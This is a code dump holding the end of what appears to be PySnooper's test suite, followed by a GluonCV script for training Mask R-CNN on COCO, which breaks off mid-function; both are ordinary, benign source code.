ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
)
)
def test_cellvars():
string_io = io.StringIO()
def f2(a):
def f3(a):
x = 0
x += 1
def f4(a):
y = x
return 42
return f4(a)
return f3(a)
def f1(a):
with pysnooper.snoop(string_io, depth=4):
result1 = f2(a)
return result1
result = f1(42)
assert result == 42
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(a)'),
VariableEntry(),
CallEntry('def f2(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry("a"),
CallEntry('def f3(a):'),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
VariableEntry("x"),
CallEntry('def f4(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
)
)
def test_var_order():
string_io = io.StringIO()
def f(one, two, three, four):
five = None
six = None
seven = None
five, six, seven = 5, 6, 7
with pysnooper.snoop(string_io, depth=2):
result = f(1, 2, 3, 4)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result = f(1, 2, 3, 4)'),
VariableEntry("one", "1"),
VariableEntry("two", "2"),
VariableEntry("three", "3"),
VariableEntry("four", "4"),
CallEntry('def f(one, two, three, four):'),
LineEntry(),
VariableEntry("five"),
LineEntry(),
VariableEntry("six"),
LineEntry(),
VariableEntry("seven"),
LineEntry(),
VariableEntry("five", "5"),
VariableEntry("six", "6"),
VariableEntry("seven", "7"),
ReturnEntry(),
ReturnValueEntry(),
)
)
def test_truncate():
max_length = 20
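# truncate() is expected to leave strings at or under max_length untouched
# and to shorten longer ones to exactly max_length by keeping the head and
# tail around a '...' marker, as the assertions below check.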
for i in range(max_length * 2):
string = i * 'a'
truncated = truncate(string, max_length)
if len(string) <= max_length:
assert string == truncated
else:
assert truncated == 'aaaaaaaa...aaaaaaaaa'
assert len(truncated) == max_length
def test_indentation():
from .samples import indentation, recursion
assert_sample_output(indentation)
assert_sample_output(recursion)
def test_exception():
from .samples import exception
assert_sample_output(exception)
def test_generator():
string_io = io.StringIO()
original_tracer = sys.gettrace()
original_tracer_active = lambda: (sys.gettrace() is original_tracer)
@pysnooper.snoop(string_io)
def f(x1):
assert not original_tracer_active()
x2 = (yield x1)
assert not original_tracer_active()
x3 = 'foo'
assert not original_tracer_active()
x4 = (yield 2)
assert not original_tracer_active()
return
assert original_tracer_active()
generator = f(0)
assert original_tracer_active()
first_item = next(generator)
assert original_tracer_active()
assert first_item == 0
second_item = generator.send('blabla')
assert original_tracer_active()
assert second_item == 2
with pytest.raises(StopIteration) as exc_info:
generator.send('looloo')
assert original_tracer_active()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x1', '0'),
VariableEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('0'),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x2', "'blabla'"),
LineEntry(),
LineEntry(),
VariableEntry('x3', "'foo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('2'),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x4', "'looloo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(None),
)
)
def test_custom_repr():
string_io = io.StringIO()
def large(l):
return isinstance(l, list) and len(l) > 5
def print_list_size(l):
return 'list(size={})'.format(len(l))
def print_dict(d):
return 'dict(keys={})'.format(sorted(list(d.keys())))
def evil_condition(x):
return large(x) or isinstance(x, dict)
@pysnooper.snoop(string_io, custom_repr=(
(large, print_list_size),
(dict, print_dict),
(evil_condition, lambda x: 'I am evil')))
def sum_to_x(x):
l = list(range(x))
a = {'1': 1, '2': 2}
return sum(l)
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'list(size=10000)'),
LineEntry(),
VariableEntry('a', "dict(keys=['1', '2'])"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('49995000'),
)
)
def test_custom_repr_single():
string_io = io.StringIO()
@pysnooper.snoop(string_io, custom_repr=(list, lambda l: 'foofoo!'))
def sum_to_x(x):
l = list(range(x))
return 7
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'foofoo!'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
)
)
def test_disable():
string_io = io.StringIO()
def my_function(foo):
x = 7
y = 8
return x + y
with mini_toolbox.TempValueSetter((pysnooper.tracer, 'DISABLED'), True):
tracer = pysnooper.snoop(string_io)
with tracer:
result = my_function('baba')
my_decorated_function = tracer(my_function)
my_decorated_function('booboo')
output = string_io.getvalue()
assert not output
def test_class():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
class MyClass(object):
def __init__(self):
self.x = 7
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object at"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('self', value_regex="u?.+MyClass object at"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
)
)
def test_class_with_decorated_method():
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object at"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('args', value_regex=r"\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"\{\}"),
VariableEntry('function', value_regex="u?.+my_method at"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
)
)
def test_class_with_decorated_method_and_snoop_applied_to_method():
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
@pysnooper.snoop(string_io)
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
VariableEntry('args', value_regex=r"u?\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"u?\{\}"),
VariableEntry('function', value_regex="u?.*my_method at"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object at"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
)
)
def test_class_with_property():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
class MyClass(object):
def __init__(self):
self._x = 0
def plain_method(self):
pass
@property
def x(self):
self.plain_method()
return self._x
@x.setter
def x(self, value):
self.plain_method()
self._x = value
@x.deleter
def x(self):
self.plain_method()
del self._x
instance = MyClass()
# Do simple property operations, make sure we didn't mess up the normal behavior
result = instance.x
assert result == instance._x
instance.x = 1
assert instance._x == 1
del instance.x
with pytest.raises(AttributeError):
instance._x
# The property methods will not be traced, but their calls to plain_method will be.
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def __init__(self):'),
LineEntry('self._x = 0'),
ReturnEntry('self._x = 0'),
ReturnValueEntry('None'),
# Called from getter
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
# Called from setter
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
# Called from deleter
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
)
)
def test_snooping_on_class_does_not_cause_base_class_to_be_snooped():
string_io = io.StringIO()
class UnsnoopedBaseClass(object):
def __init__(self):
self.method_on_base_class_was_called = False
def method_on_base_class(self):
self.method_on_base_class_was_called = True
@pysnooper.snoop(string_io)
class MyClass(UnsnoopedBaseClass):
def method_on_child_class(self):
self.method_on_base_class()
instance = MyClass()
assert not instance.method_on_base_class_was_called
instance.method_on_child_class()
assert instance.method_on_base_class_was_called
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object at"),
CallEntry('def method_on_child_class(self):'),
LineEntry('self.method_on_base_class()'),
ReturnEntry('self.method_on_base_class()'),
ReturnValueEntry('None'),
)
)
|
train_mask_rcnn.py
|
"""Train Mask RCNN end to end."""
import argparse
import os
# disable autotune
os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '0'
os.environ['MXNET_GPU_MEM_POOL_TYPE'] = 'Round'
os.environ['MXNET_GPU_MEM_POOL_ROUND_LINEAR_CUTOFF'] = '28'
os.environ['MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD'] = '999'
os.environ['MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD'] = '25'
os.environ['MXNET_GPU_COPY_NTHREADS'] = '1'
os.environ['MXNET_OPTIMIZER_AGGREGATION_SIZE'] = '54'
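# The environment variables above are MXNet performance and memory knobs
# (GPU memory pool rounding, bulk-execution segment sizes, copy threads and
# optimizer aggregation); they are set before `import mxnet` so they take effect.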
import logging
import time
import numpy as np
import mxnet as mx
from mxnet import gluon
from mxnet import autograd
from mxnet.contrib import amp
import gluoncv as gcv
gcv.utils.check_version('0.7.0')
from gluoncv import data as gdata
from gluoncv import utils as gutils
from gluoncv.model_zoo import get_model
from gluoncv.data import batchify
from gluoncv.data.transforms.presets.rcnn import MaskRCNNDefaultTrainTransform, \
MaskRCNNDefaultValTransform
from gluoncv.utils.metrics.coco_instance import COCOInstanceMetric
from gluoncv.utils.metrics.rcnn import RPNAccMetric, RPNL1LossMetric, RCNNAccMetric, \
RCNNL1LossMetric, MaskAccMetric, MaskFGAccMetric
from gluoncv.utils.parallel import Parallelizable, Parallel
from gluoncv.data import COCODetection, VOCDetection
from multiprocessing import Process
try:
import horovod.mxnet as hvd
except ImportError:
hvd = None
try:
from mpi4py import MPI
except ImportError:
logging.info('mpi4py is not installed. Use "pip install --no-cache mpi4py" to install')
MPI = None
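# horovod and mpi4py appear to be optional dependencies here, used only for
# distributed training with the --horovod flag.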
# from mxnet import profiler
def parse_args():
parser = argparse.ArgumentParser(description='Train Mask R-CNN network end to end.')
parser.add_argument('--network', type=str, default='resnet50_v1b',
help="Base network name which serves as feature extraction base.")
parser.add_argument('--dataset', type=str, default='coco',
help='Training dataset. Now support coco.')
parser.add_argument('--num-workers', '-j', dest='num_workers', type=int,
default=4, help='Number of data workers; you can use a larger '
'number to accelerate data loading if your CPU and GPUs '
'are powerful.')
parser.add_argument('--batch-size', type=int, default=8, help='Training mini-batch size.')
parser.add_argument('--gpus', type=str, default='0',
help='Training with GPUs, you can specify 1,3 for example.')
parser.add_argument('--epochs', type=str, default='',
help='Training epochs.')
parser.add_argument('--resume', type=str, default='',
help='Resume from previously saved parameters if not None. '
'For example, you can resume from ./mask_rcnn_xxx_0123.params')
parser.add_argument('--start-epoch', type=int, default=0,
help='Starting epoch for resuming, default is 0 for new training. '
'You can set it to 100, for example, to resume from epoch 100.')
parser.add_argument('--lr', type=str, default='',
help='Learning rate, default is 0.01 for coco 8 gpus training.')
parser.add_argument('--lr-decay', type=float, default=0.1,
help='decay rate of learning rate. default is 0.1.')
parser.add_argument('--lr-decay-epoch', type=str, default='',
help='epochs at which learning rate decays. default is 17,23 for coco.')
parser.add_argument('--lr-warmup', type=str, default='',
help='warmup iterations to adjust learning rate, default is 1000 for coco.')
parser.add_argument('--lr-warmup-factor', type=float, default=1. / 3.,
help='warmup factor of base lr.')
parser.add_argument('--clip-gradient', type=float, default=-1., help='gradient clipping.')
parser.add_argument('--momentum', type=float, default=0.9,
help='SGD momentum, default is 0.9')
parser.add_argument('--wd', type=str, default='',
help='Weight decay, default is 1e-4 for coco')
parser.add_argument('--log-interval', type=int, default=100,
help='Logging mini-batch interval. Default is 100.')
parser.add_argument('--save-prefix', type=str, default='',
help='Saving parameter prefix')
parser.add_argument('--save-interval', type=int, default=1,
help='Saving parameters epoch interval, best model will always be saved.')
parser.add_argument('--val-interval', type=int, default=1,
help='Epoch interval for validation; increasing the number will reduce the '
'training time if validation is slow.')
parser.add_argument('--seed', type=int, default=233,
help='Random seed to be fixed.')
parser.add_argument('--verbose', dest='verbose', action='store_true',
help='Print helpful debugging info once set.')
# Norm layer options
parser.add_argument('--norm-layer', type=str, default=None,
help='Type of normalization layer to use. '
'If set to None, backbone normalization layer will be fixed,'
' and no normalization layer will be used. '
'Currently supports \'bn\', and None, default is None')
# Loss options
parser.add_argument('--rpn-smoothl1-rho', type=float, default=1. / 9.,
help='RPN box regression transition point from L1 to L2 loss. '
'Set to 0.0 to make the loss simply L1.')
parser.add_argument('--rcnn-smoothl1-rho', type=float, default=1.,
help='RCNN box regression transition point from L1 to L2 loss. '
'Set to 0.0 to make the loss simply L1.')
# FPN options
parser.add_argument('--use-fpn', action='store_true',
help='Whether to use feature pyramid network.')
# Performance options
parser.add_argument('--disable-hybridization', action='store_true',
help='Whether to disable hybridizing the entire model. '
'Memory usage and speed will decrease.')
parser.add_argument('--static-alloc', action='store_true',
help='Whether to use static memory allocation. Memory usage will increase.')
parser.add_argument('--amp', action='store_true',
help='Use MXNet AMP for mixed precision training.')
parser.add_argument('--horovod', action='store_true',
help='Use MXNet Horovod for distributed training. Must be run with OpenMPI. '
'--gpus is ignored when using --horovod.')
parser.add_argument('--use-ext', action='store_true',
help='Use the NVIDIA MSCOCO API. Make sure you install it first.')
parser.add_argument('--executor-threads', type=int, default=1,
help='Number of threads for executor for scheduling ops. '
'More threads may incur higher GPU memory footprint, '
'but may speed up throughput. Note that when horovod is used, '
'it is set to 1.')
parser.add_argument('--kv-store', type=str, default='nccl',
help='KV store options. local, device, nccl, dist_sync, dist_device_sync, '
'dist_async are available.')
# Advanced options. Expert Only!! Currently non-FPN model is not supported!!
# Default setting is for MS-COCO.
# The following options are only used if custom-model is enabled
subparsers = parser.add_subparsers(dest='custom_model')
custom_model_parser = subparsers.add_parser(
'custom-model',
help='Use custom Mask R-CNN w/ FPN model. This is for experts only!'
' You can modify model internal parameters here. Once enabled, '
'custom model options become available.')
custom_model_parser.add_argument(
'--no-pretrained-base', action='store_true', help='Disable pretrained base network.')
custom_model_parser.add_argument(
'--num-fpn-filters', type=int, default=256, help='Number of filters in FPN output layers.')
custom_model_parser.add_argument(
'--num-box-head-conv', type=int, default=4,
help='Number of convolution layers to use in box head if '
'batch normalization is not frozen.')
custom_model_parser.add_argument(
'--num-box-head-conv-filters', type=int, default=256,
help='Number of filters for convolution layers in box head.'
' Only applicable if batch normalization is not frozen.')
custom_model_parser.add_argument(
'--num_box_head_dense_filters', type=int, default=1024,
help='Number of hidden units for the last fully connected layer in '
'box head.')
custom_model_parser.add_argument(
'--image-short', type=str, default='800',
help='Short side of the image. Pass a tuple to enable random scale augmentation.')
custom_model_parser.add_argument(
'--image-max-size', type=int, default=1333,
help='Max size of the longer side of the image.')
custom_model_parser.add_argument(
'--nms-thresh', type=float, default=0.5,
help='Non-maximum suppression threshold for R-CNN. '
'You can specify < 0 or > 1 to disable NMS.')
custom_model_parser.add_argument(
'--nms-topk', type=int, default=-1,
help='Apply NMS to top k detection results in R-CNN. '
'Set to -1 to disable so that every detection result is used in NMS.')
custom_model_parser.add_argument(
'--post-nms', type=int, default=-1,
help='Only return top `post_nms` detection results, the rest is discarded.'
' Set to -1 to return all detections.')
custom_model_parser.add_argument(
'--roi-mode', type=str, default='align', choices=['align', 'pool'],
help='ROI pooling mode. Currently support \'pool\' and \'align\'.')
custom_model_parser.add_argument(
'--roi-size', type=str, default='14,14',
help='The output spatial size of the ROI layer, e.g. ROIAlign or ROIPooling.')
custom_model_parser.add_argument(
'--strides', type=str, default='4,8,16,32,64',
help='Feature map stride with respect to original image. '
'This is usually the ratio between original image size and '
'feature map size. Since the custom model uses FPN, it is a list of ints')
custom_model_parser.add_argument(
'--clip', type=float, default=4.14,
help='Clip bounding box transformation predictions '
'to prevent exponentiation from overflowing')
custom_model_parser.add_argument(
'--rpn-channel', type=int, default=256,
help='Number of channels used in RPN convolution layers.')
custom_model_parser.add_argument(
'--anchor-base-size', type=int, default=16,
help='The width (and height) of the reference anchor box.')
custom_model_parser.add_argument(
'--anchor-aspect-ratio', type=str, default='0.5,1,2',
help='The aspect ratios of anchor boxes.')
custom_model_parser.add_argument(
'--anchor-scales', type=str, default='2,4,8,16,32',
help='The scales of anchor boxes with respect to base size. '
'We use the following form to compute the shapes of anchors: '
'anchor_width = base_size * scale * sqrt(1 / ratio), '
'anchor_height = base_size * scale * sqrt(ratio).')
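# Worked example of the anchor formula above (hypothetical numbers, not new
# defaults): with base_size=16, scale=8, ratio=0.5,
#   anchor_width  = 16 * 8 * sqrt(1 / 0.5) ~= 181.0
#   anchor_height = 16 * 8 * sqrt(0.5)     ~= 90.5
# i.e. a wide, roughly 2:1 box; ratio=2 would give the transposed shape.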
custom_model_parser.add_argument(
'--anchor-alloc-size', type=str, default='384,384',
help='Allocate size for the anchor boxes as (H, W). '
'We generate enough anchors for large feature map, e.g. 384x384. '
'During inference we can have variable input sizes, '
'at which time we can crop corresponding anchors from this large '
'anchor map so we can skip re-generating anchors for each input. ')
custom_model_parser.add_argument(
'--rpn-nms-thresh', type=float, default=0.7,
help='Non-maximum suppression threshold for RPN.')
custom_model_parser.add_argument(
'--rpn-train-pre-nms', type=int, default=12000,
help='Filter top proposals before NMS in RPN training.')
custom_model_parser.add_argument(
'--rpn-train-post-nms', type=int, default=2000,
help='Return top proposal results after NMS in RPN training. '
'Will be set to rpn_train_pre_nms if it is larger than '
'rpn_train_pre_nms.')
custom_model_parser.add_argument(
'--rpn-test-pre-nms', type=int, default=6000,
help='Filter top proposals before NMS in RPN testing.')
custom_model_parser.add_argument(
'--rpn-test-post-nms', type=int, default=1000,
help='Return top proposal results after NMS in RPN testing. '
'Will be set to rpn_test_pre_nms if it is larger than rpn_test_pre_nms.')
custom_model_parser.add_argument(
'--rpn-min-size', type=int, default=1,
help='Proposals whose size is smaller than ``min_size`` will be discarded.')
custom_model_parser.add_argument(
'--rcnn-num-samples', type=int, default=512, help='Number of samples for RCNN training.')
custom_model_parser.add_argument(
'--rcnn-pos-iou-thresh', type=float, default=0.5,
help='Proposals whose IoU is larger than ``pos_iou_thresh`` are '
'regarded as positive samples for R-CNN.')
custom_model_parser.add_argument(
'--rcnn-pos-ratio', type=float, default=0.25,
help='``pos_ratio`` defines how many positive samples '
'(``pos_ratio * num_sample``) are to be sampled for R-CNN.')
custom_model_parser.add_argument(
'--max-num-gt', type=int, default=100,
help='Maximum ground-truth number for each example. This is only an upper bound, '
'not necessarily precise. However, using a very large number may slow down '
'the training.')
custom_model_parser.add_argument(
'--target-roi-scale', type=int, default=2,
help='Ratio of mask output roi / input roi. '
'For model with FPN, this is typically 2.')
custom_model_parser.add_argument(
'--num-mask-head-convs', type=int, default=4,
help='Number of convolution blocks before deconv layer for mask head. '
'For FPN network this is typically 4.')
args = parser.parse_args()
if args.horovod:
if hvd is None:
raise SystemExit("Horovod not found, please check if you installed it correctly.")
hvd.init()
args.epochs = int(args.epochs) if args.epochs else 26
args.lr_decay_epoch = args.lr_decay_epoch if args.lr_decay_epoch else '17,23'
args.lr = float(args.lr) if args.lr else (0.00125 * args.batch_size)
args.lr_warmup = args.lr_warmup if args.lr_warmup else max((8000 / args.batch_size), 1000)
args.wd = float(args.wd) if args.wd else 1e-4
def str_args2num_args(arguments, args_name, num_type):
try:
ret = [num_type(x) for x in arguments.split(',')]
if len(ret) == 1:
return ret[0]
return ret
except ValueError:
raise ValueError('invalid value for {}: {}'.format(args_name, arguments))
if args.custom_model:
args.image_short = str_args2num_args(args.image_short, '--image-short', int)
args.roi_size = str_args2num_args(args.roi_size, '--roi-size', int)
args.strides = str_args2num_args(args.strides, '--strides', int)
args.anchor_aspect_ratio = str_args2num_args(args.anchor_aspect_ratio,
'--anchor-aspect-ratio', float)
args.anchor_scales = str_args2num_args(args.anchor_scales, '--anchor-scales', float)
args.anchor_alloc_size = str_args2num_args(args.anchor_alloc_size,
'--anchor-alloc-size', int)
if args.amp and args.norm_layer == 'bn':
raise NotImplementedError('SyncBatchNorm currently does not support AMP.')
return args
def get_dataset(dataset, args):
if dataset.lower() == 'coco':
train_dataset = gdata.COCOInstance(splits='instances_train2017')
val_dataset = gdata.COCOInstance(splits='instances_val2017', skip_empty=False)
starting_id = 0
if args.horovod and MPI:
length = len(val_dataset)
shard_len = length // hvd.size()
rest = length % hvd.size()
# Compute the start index for this partition
starting_id = shard_len * hvd.rank() + min(hvd.rank(), rest)
val_metric = COCOInstanceMetric(val_dataset, args.save_prefix + '_eval',
use_ext=args.use_ext, starting_id=starting_id)
else:
raise NotImplementedError('Dataset: {} not implemented.'.format(dataset))
if args.horovod and MPI:
val_dataset = val_dataset.shard(hvd.size(), hvd.rank())
return train_dataset, val_dataset, val_metric
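# Worked example of the sharding arithmetic above (hypothetical numbers, not
# defaults): with len(val_dataset) == 10 and hvd.size() == 4, shard_len == 2 and
# rest == 2, so starting_id evaluates to 0, 3, 6, 8 for ranks 0-3, matching
# per-rank shards of 3, 3, 2, 2 samples that cover the dataset exactly once.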
def get_dataloader(net, train_dataset, val_dataset, train_transform, val_transform, batch_size,
num_shards_per_process, args):
"""Get dataloader."""
train_bfn = batchify.MaskRCNNTrainBatchify(net, num_shards_per_process)
train_sampler = \
gcv.nn.sampler.SplitSortedBucketSampler(train_dataset.get_im_aspect_ratio(),
batch_size,
num_parts=hvd.size() if args.horovod else 1,
part_index=hvd.rank() if args.horovod else 0,
shuffle=True)
train_loader = mx.gluon.data.DataLoader(train_dataset.transform(
train_transform(net.short, net.max_size, net, ashape=net.ashape, multi_stage=args.use_fpn)),
batch_sampler=train_sampler, batchify_fn=train_bfn, num_workers=args.num_workers)
val_bfn = batchify.Tuple(*[batchify.Append() for _ in range(2)])
short = net.short[-1] if isinstance(net.short, (tuple, list)) else net.short
# validation uses 1 sample per device
val_loader = mx.gluon.data.DataLoader(
val_dataset.transform(val_transform(short, net.max_size)), num_shards_per_process, False,
batchify_fn=val_bfn, last_batch='keep', num_workers=args.num_workers)
return train_loader, val_loader
def save_params(net, logger, best_map, current_map, epoch, save_interval, prefix):
current_map = float(current_map)
if current_map > best_map[0]:
logger.info('[Epoch {}] mAP {} higher than current best {}, saving to {}'.format(
epoch, current_map, best_map, '{:s}_best.params'.format(prefix)))
best_map[0] = current_map
net.save_parameters('{:s}_best.params'.format(prefix))
with open(prefix + '_best_map.log', 'a') as f:
f.write('\n{:04d}:\t{:.4f}'.format(epoch, current_map))
if save_interval and (epoch + 1) % save_interval == 0:
logger.info('[Epoch {}] Saving parameters to {}'.format(
epoch, '{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_map)))
net.save_parameters('{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_map))
def _stage_data(i, data, ctx_list, pinned_data_stage):
def _get_chunk(data, storage):
s = storage.reshape(shape=(storage.size,))
s = s[:data.size]
s = s.reshape(shape=data.shape)
data.copyto(s)
return s
if ctx_list[0].device_type == "cpu":
return data
if i not in pinned_data_stage:
pinned_data_stage[i] = [d.as_in_context(mx.cpu_pinned()) for d in data]
return pinned_data_stage[i]
storage = pinned_data_stage[i]
for j in range(len(storage)):
if data[j].size > storage[j].size:
storage[j] = data[j].as_in_context(mx.cpu_pinned())
return [_get_chunk(d, s) for d, s in zip(data, storage)]
pinned_data_stage = {}
def split_and_load(batch, ctx_list):
"""Split data to 1 batch each device."""
new_batch = []
for i, data in enumerate(batch):
if isinstance(data, (list, tuple)):
new_data = [x.as_in_context(ctx) for x, ctx in zip(data, ctx_list)]
else:
new_data = [data.as_in_context(ctx_list[0])]
new_batch.append(new_data)
return new_batch
def validate(net, val_data, async_eval_processes, ctx, eval_metric, logger, epoch, best_map, args):
"""Test on validation dataset."""
clipper = gcv.nn.bbox.BBoxClipToImage()
eval_metric.reset()
if not args.disable_hybridization:
net.hybridize(static_alloc=args.static_alloc)
tic = time.time()
for ib, batch in enumerate(val_data):
batch = split_and_load(batch, ctx_list=ctx)
det_bboxes = []
det_ids = []
det_scores = []
det_masks = []
det_infos = []
for x, im_info in zip(*batch):
# get prediction results
ids, scores, bboxes, masks = net(x)
det_bboxes.append(clipper(bboxes, x))
det_ids.append(ids)
det_scores.append(scores)
det_masks.append(masks)
det_infos.append(im_info)
# update metric
for det_bbox, det_id, det_score, det_mask, det_info in zip(det_bboxes, det_ids, det_scores,
det_masks, det_infos):
for i in range(det_info.shape[0]):
# numpy everything
det_bbox = det_bbox[i].asnumpy()
det_id = det_id[i].asnumpy()
det_score = det_score[i].asnumpy()
det_mask = det_mask[i].asnumpy()
det_info = det_info[i].asnumpy()
# filter by conf threshold
im_height, im_width, im_scale = det_info
valid = np.where(((det_id >= 0) & (det_score >= 0.001)))[0]
det_id = det_id[valid]
det_score = det_score[valid]
det_bbox = det_bbox[valid] / im_scale
det_mask = det_mask[valid]
# fill full mask
im_height, im_width = int(round(im_height / im_scale)), int(
round(im_width / im_scale))
full_masks = gdata.transforms.mask.fill(det_mask, det_bbox, (im_width, im_height))
eval_metric.update(det_bbox, det_id, det_score, full_masks)
if args.horovod and MPI is not None:
comm = MPI.COMM_WORLD
res = comm.gather(eval_metric.get_result_buffer(), root=0)
if hvd.rank() == 0:
logger.info('[Epoch {}] Validation Inference cost: {:.3f}'
.format(epoch, (time.time() - tic)))
rank0_res = eval_metric.get_result_buffer()
if len(rank0_res) == 2:
res = res[1:]
rank0_res[0].extend([item for res_tuple in res for item in res_tuple[0]])
rank0_res[1].extend([item for res_tuple in res for item in res_tuple[1]])
else:
rank0_res.extend([item for r in res for item in r])
def coco_eval_save_task(eval_metric, logger):
map_name, mean_ap = eval_metric.get()
if map_name and mean_ap is not None:
val_msg = '\n'.join(['{}={}'.format(k, v) for k, v in zip(map_name, mean_ap)])
logger.info('[Epoch {}] Validation: \n{}'.format(epoch, val_msg))
current_map = float(mean_ap[-1])
save_params(net, logger, best_map, current_map, epoch, args.save_interval,
args.save_prefix)
if not args.horovod or hvd.rank() == 0:
p = Process(target=coco_eval_save_task, args=(eval_metric, logger))
async_eval_processes.append(p)
p.start()
def get_lr_at_iter(alpha, lr_warmup_factor=1. / 3.):
return lr_warmup_factor * (1 - alpha) + alpha
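# get_lr_at_iter() linearly interpolates the warmup factor from lr_warmup_factor
# (1/3 by default) at alpha=0 up to 1 at alpha=1. Worked example with a
# hypothetical base_lr of 0.01 and lr_warmup of 1000 iterations:
#   iter    0: lr = 0.01 * get_lr_at_iter(0.0) ~= 0.0033
#   iter  500: lr = 0.01 * get_lr_at_iter(0.5) ~= 0.0067
#   iter 1000: lr = 0.01 * get_lr_at_iter(1.0)  = 0.01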
class ForwardBackwardTask(Parallelizable):
def __init__(self, net, optimizer, rpn_cls_loss, rpn_box_loss, rcnn_cls_loss, rcnn_box_loss,
rcnn_mask_loss):
super(ForwardBackwardTask, self).__init__()
self.net = net
self._optimizer = optimizer
self.rpn_cls_loss = rpn_cls_loss
self.rpn_box_loss = rpn_box_loss
self.rcnn_cls_loss = rcnn_cls_loss
self.rcnn_box_loss = rcnn_box_loss
self.rcnn_mask_loss = rcnn_mask_loss
def forward_backward(self, x):
data, label, gt_mask, rpn_cls_targets, rpn_box_targets, rpn_box_masks = x
with autograd.record():
gt_label = label[:, :, 4:5]
gt_box = label[:, :, :4]
cls_pred, box_pred, mask_pred, roi, samples, matches, rpn_score, rpn_box, anchors, \
cls_targets, box_targets, box_masks, indices = self.net(data, gt_box, gt_label)
# losses of rpn
